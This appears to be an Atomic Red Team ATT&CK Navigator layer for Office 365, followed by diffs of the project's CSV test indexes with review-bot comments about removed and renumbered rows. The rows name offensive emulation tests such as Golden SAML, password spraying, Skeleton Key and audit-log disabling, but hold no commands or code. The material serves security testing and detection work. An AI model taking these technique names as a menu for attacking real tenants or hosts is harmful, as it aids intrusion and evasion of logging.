{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log 
Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
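Review bot: only versions.attack and versions.navigator change here; T1562 (3 = T1562.001 1 + T1562.008 2) and T1114 (2 = T1114.002 1 + T1114.003 1) roll up correctly. The T1562.001 comment "office-365-Disable-AntiPhishRule" is a hyphenated slug rather than a display name and reads oddly next to "Office 365 - Exchange Audit Log Disabled" and "EXO - Full access mailbox permission granted to a user"; rename the atomic so generated layers stay consistent.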
@@ -1,23 +1 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
privilege-escalation T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
privilege-escalation T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
privilege-escalation T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
persistence T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
persistence T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
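Review bot: per the header (-1,23 +1) this hunk drops every data row of the Azure AD index, all 22 tests across credential-access, defense-evasion, privilege-escalation and persistence (Golden SAML, both password-spray tests, Add Federation to Azure AD, both application-hijacking tests, the user-creation tests and the role/permission additions), leaving only the header. Nothing visible in this compare shows those tests landing in another index, so either the generator no longer recognises the platform these atomics are tagged with, or the platform was deliberately retired; the commit should say which. If it is a regression, the cheapest guard is for the generator to fail, or at least warn, when a regenerated index goes from N rows to zero.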
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
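Review bot: -1 +0,0 deletes a file whose only content was the CSV header, so nothing is lost, but it sets a precedent the preceding hunk makes awkward: that index is now also header-only and will presumably be removed on the next run, and any consumer that opens these indexes by fixed path will then get a missing file instead of an empty table. Decide whether empty platform indexes are kept as header-only files or deleted, and apply one rule consistently in a single commit.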
@@ -8,7 +8,6 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
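Review bot: the row "defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh" is dropped while tests 7, 8 and 10 of the same technique stay, and nothing in the change says why. Confirm that the atomic itself was removed rather than skipped by whatever produced this CSV, since a test missing from the index is invisible to tooling that enumerates tests from it; the same row is also removed from the larger index later in this change, so at least the two indexes stay consistent with each other.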
+6 -55
@@ -38,7 +38,6 @@ defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS dev
defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
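Review bot: the last test of T1027.013, "3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash", is removed with no replacement, and it is the only bash-executor test in that technique (tests 1 and 2 are powershell). If the index generator now filters on executor or fails on this test's YAML, that is a regression to fix rather than an entry to drop; if the atomic was really deleted, say so in the commit message.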
@@ -556,7 +555,6 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
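Review bot: T1027 loses its test 11, "Obfuscated PowerShell Command via Character Array" (GUID 6683baf0-6e77-4f58-b114-814184ea8150), without a stated reason. Because it is the highest-numbered test of the technique no renumbering occurs, but please confirm the atomic was intentionally removed; an index that silently shrinks is the hardest kind of change to notice later.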
@@ -605,11 +603,9 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
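Review bot: two unrelated rows disappear in this hunk: T1562.008 test 11 ("AWS - Config Logs Disabled", 4608bc1b-e682-466b-a7d7-dbd76760db31) and T1556.001 test 1 ("Skeleton Key via Mimikatz", 0ee8081f-e9a7-4a2e-a23f-68473023184f). The second is the only T1556.001 entry under defense-evasion, and the same GUID is also dropped from the persistence and credential-access sections of this diff, so the technique vanishes from the index entirely; a whole-technique removal should be called out explicitly rather than buried in a bulk update of the CSV.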
@@ -931,11 +927,6 @@ privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquo
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
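Review bot: all five T1546.018 "Event Triggered Execution: Python Startup Hooks" rows (57289962-21dc-4501-b756-80cd30608d9f, 05cc7a2c-ce32-46f2-a358-f27f76718c39, a58c066d-f2f0-42a2-ab70-30af73f89e66, 28ca4f81-fa96-47ff-8555-dde98017e89b, 6e78084a-a433-4702-a838-cc7b765d87e8) are removed from privilege-escalation, leaving the technique with no entry in this tactic. Check that the technique's YAML was not simply unreadable for the tool that built this index; losing five tests at once, across both powershell and sh executors, looks more like a parse or path failure than five deliberate deletions.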
@@ -1033,14 +1024,6 @@ execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
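Review bot: the execution section loses every T1569.003 "System Services: Systemctl" test, rows 1 through 8 (e58c8723-5503-4533-b642-535cd20ec648 through 6fec8560-ff64-4bbf-bc79-734fea48f7ca), which is the largest single removal in this diff. If that is intended, the commit should state that T1569.003 is being retired; if not, the index should be rebuilt from a tree that still contains the technique before this change is merged.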
@@ -1182,14 +1165,10 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
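Review bot: inserting "Chrome/Chromium (Chrome Web Store)" (4c83940d-8ca5-4bb2-8100-f46dc914bc3f) as T1176 test 2 shifts Firefox, the Edge VPN addon and "Google Chrome Load Unpacked Extension With Command Line" from tests 2, 3 and 4 to 3, 4 and 5 while their GUIDs stay the same, so anything that refers to these atomics by technique plus test number now points at a different test; the GUID is the stable key and is what downstream references should use. The same hunk also drops all five T1137.005 "Office Application Startup: Outlook Rules" rows (ffadc988-b682-4a68-bd7e-4803666be637, bddfd8d4-7687-4971-b611-50a537ab3ab4, b0bd3d76-a57c-4699-83f4-8cd798dd09bd, 5ff5249a-5807-480e-ab52-c430497a8a25, cb814cf8-24f2-41dc-a1cd-1c2073276d4a), an unrelated change that deserves a separate commit or at least its own line in the message.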
@@ -1425,11 +1404,6 @@ persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
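Review bot: the five T1546.018 Python Startup Hooks rows are removed here from persistence as well, matching their removal from privilege-escalation earlier in the diff, so the two tactic sections stay in sync. That consistency is good, but it also means the technique now has no trace in the index at all; confirm that is the intent rather than a side effect of the index tool failing on the technique directory.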
@@ -1439,7 +1413,6 @@ persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Bin
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
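Review bot: "persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell" is removed and T1556.001 has no other persistence entry, so the technique drops out of this tactic. Together with the identical removals under defense-evasion and credential-access, the Skeleton Key atomic is gone from every tactic it was listed under; make sure the YAML was actually deleted and that nothing else in the repository still references the GUID.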
@@ -1479,7 +1452,6 @@ persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free proces
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
